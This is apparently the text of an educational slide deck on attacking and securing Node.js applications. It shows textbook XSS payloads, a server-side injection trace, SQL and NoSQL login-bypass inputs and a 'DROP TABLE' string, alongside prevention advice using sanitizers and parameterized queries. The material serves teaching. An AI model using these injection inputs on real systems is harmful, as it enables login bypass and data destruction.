  • 24. Hacking in Node.js #sitWDF Off Course XSS Improper parsing of nested tags and Incomplete filtering of javascript: URIs <s <onmouseover="alert(1)"> <s onmouseover="alert(1)">This is a test</s> <a href="javascriptJ a V a S c R iPt::alert(1)" "<s>">test</a> (With any Encoding)
  • 25. Hacking in Node.js #sitWDF Server Side JavaScript Injection Simple JS Command: response.end(“Ended Response”); [pid 25170] execve("/bin/sh", ["/bin/sh", "-c", "ls -l user input"],
  • 26. Hacking in Node.js #sitWDF SQL and NoSQL Injection Classic SQL Injection Bypass SELECT * FROM users WHERE username = '$username' AND password = '$password‘ (SELECT * FROM users WHERE username = '' or 1=1--' AND password = '‘) select author from books where id=$id -> (select author from books where id=2 or 1=1) Statement stmt = conn.createStatement("INSERT INTO students VALUES('" + user + "')"); stmt.execute(); (Robert'); DROP TABLE students; --) db.users.find({username: username, password: password}); (NoSQL) { "username": {"$gt": ""}, "password": {"$gt": ""} }
  • 27. Secure Node.js #sitWDF Protection XSS Prevention • Sanitize untrusted HTML http://jsxss.com/en/index.html https://github.com/theSmaw/Caja-HTML-Sanitizer https://www.owasp.org/index.php/Projects/OWASP_Node_js_Goat_Project SSJSI Prevention • Substitution of the eval() with the JSON.parse() function, the code is no longer injectable • Use child_process.execFile or child_process.spawn instead of child_process.exec
  • 28. Secure Node.js #sitWDF Protection SQL and NoSQL Injection Prevention • Using Parameterize SQL var q = 'SELECT name FROM books WHERE id = $1'; client.query(q, ['3'], function(err, result) {}); • PreparedStatements avoid/prevent SQL Injection Statement stmt = conn.prepareStatement("INSERT INTO student VALUES(?)"); stmt.setString(1, user); stmt.execute(); (Use the $in Operator to Match Values) db.users.find({user: { $in: [user] }, pass: { $in: [pass] }}); (NoSQL)
  • 30. Positive Side • Social Good: find solution for social benefit, operations and emergencies • Penetration Testing: to find vulnerabilities that an attacker could exploit • open-source: much of this open-source code is produced, tested and improved by hackers, usually like hackathons #sitWDF Good Cause
  • 31. Negative Side • Corruption of government officials (58.0%) • Cyber-terrorism (44.8%) • Corporate tracking of personal information (44.6%) • Terrorist attacks (44.4%) • Government tracking of personal information (41.4%) • Bio-warfare (40.9%) • Identity theft (39.6%) • Economic collapse (39.2%) • Running out of money in the future (37.4%) • Credit card fraud (36.9%) • Source: Chapman University #sitWDF Top 10 fears of 2015
  • 35. Who is the Winner? A "Hacker" is a state of mind. A “Developer" is a state of function. #sitWDF Choice is Yours